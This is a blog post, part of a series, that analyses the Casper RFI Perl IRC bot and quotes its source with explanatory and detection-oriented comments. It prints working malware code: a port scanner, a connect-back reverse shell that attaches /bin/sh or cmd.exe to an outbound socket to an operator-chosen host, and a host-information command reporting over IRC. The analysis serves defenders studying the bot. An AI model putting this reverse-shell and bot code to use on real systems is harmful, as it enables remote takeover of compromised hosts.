Sep 25 2010 9:21PM GMT
Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot
Casper RFI crack bot – Part 13
There are a few more things that are worth looking at.
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
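So the bot can do some port scans for its operator and grab some banners: the portscan command tries a TCP connect, with a 4-second timeout, to each port in a fixed list on the host named in the command, and keeps the ports that open. The code that would fill %porta_banner is not part of the excerpt above. On the compromised host this shows up as a short burst of outbound connection attempts from the bot's Perl process to a single address across this port list.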
Here is the section for the connect-back shell, which runs /bin/sh or, on Windows, cmd.exe.
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
# "conback <host> <port>" branch: opens an outbound TCP connection to the
# host and port given in the command and runs an interactive shell whose
# standard handles are that connection.
# The first capture is taken as the host and the second (digits only) as
# the port; neither is validated further in this branch.
# Defender view: look for a shell (/bin/sh -i or cmd.exe) whose parent is
# a perl process and whose stdin/stdout/stderr are a TCP socket, plus an
# outbound connection from this host to an arbitrary port. Restricting
# outbound connections from the server breaks this branch at connect().
elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
# Announces the target over IRC before connecting. sendraw, $IRC_cur_socket
# and $printl are defined outside this excerpt; presumably $printl is the
# channel or nick the command came from - confirm against the rest of the bot.
sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
my $proto = getprotobyname('tcp');
# inet_aton returns undef when the host cannot be resolved; that result
# is passed to sockaddr_in unchecked.
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
# Default to an interactive Bourne shell; switch to cmd.exe when Perl
# reports a native Windows build.
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
# socket/connect failures call die. Whether that ends the whole bot depends
# on how the caller wraps this handler (eval or fork), which is not visible here.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
# Duplicate the socket onto the three standard handles so the child
# started by system() inherits the connection as its terminal. The return
# values of these open() calls are not checked.
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
# system() blocks until the shell exits, so this process handles nothing
# else for the duration of the session.
system("$shell");
# The standard handles are closed, not restored, once the shell exits,
# and SOCKET itself is not closed in this branch.
close(STDIN);
close(STDOUT);
close(STDERR);
}
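This is handy for the operator: the info command reports the OS, hostname, uptime, memory and swap, the bot's process name and PID, and the Perl and bot versions back over IRC.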
# "info" branch: collects basic host facts by running local commands and
# reports them to the IRC target in $printl.
# The match is anchored only at the start, so any argument beginning with
# "info" selects this branch.
# Defender view: each request spawns a short run of child processes from
# the perl process (uname, uptime, hostname, then free or top/dmesg
# parsing), which is visible in process-creation logging.
elsif ($funcarg =~ /^info/) {
# Backticks return command output with its trailing newline; $sysos and
# $uptime are never chomped, so the newline is still present when they
# are interpolated into the messages below.
my $sysos = `uname -sr`;
my $uptime = `uptime`;
# $sysname, $memory and $swap are assigned without "my" in this excerpt;
# presumably they are declared elsewhere in the bot - confirm.
if ( $sysos =~ /freebsd/i ) {
$sysname = `hostname`;
# Takes the fifth space-separated field of the "real memory" line in
# /var/run/dmesg.boot and divides it by 1048576.
$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
# $toploc is not set in this excerpt; presumably the path of a top
# command - confirm. It is interpolated into a shell command line.
$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
chomp($memory);
chomp($swap);
}
elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
# Second column of the "mem" and "swap" rows of `free -m`.
$memory = `free -m |grep -i mem | awk '{print \$2}'`;
$swap = `free -m |grep -i swap | awk '{print \$2}'`;
chomp($swap);
chomp($memory);
}
else {
# Any other OS: placeholder strings. The doubled semicolon on the first
# line is an empty statement and has no effect.
$sysname ="Not Found";;
$memory ="Not found";
$swap ="Not Found";
}
# One PRIVMSG per line of the report. The ^C and ^B sequences presumably
# stand for IRC colour and bold control codes as rendered on this page -
# confirm against the raw sample. $processo and $VERSAO are defined
# outside this excerpt; $$ is the bot's PID and $] the Perl version.
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
}




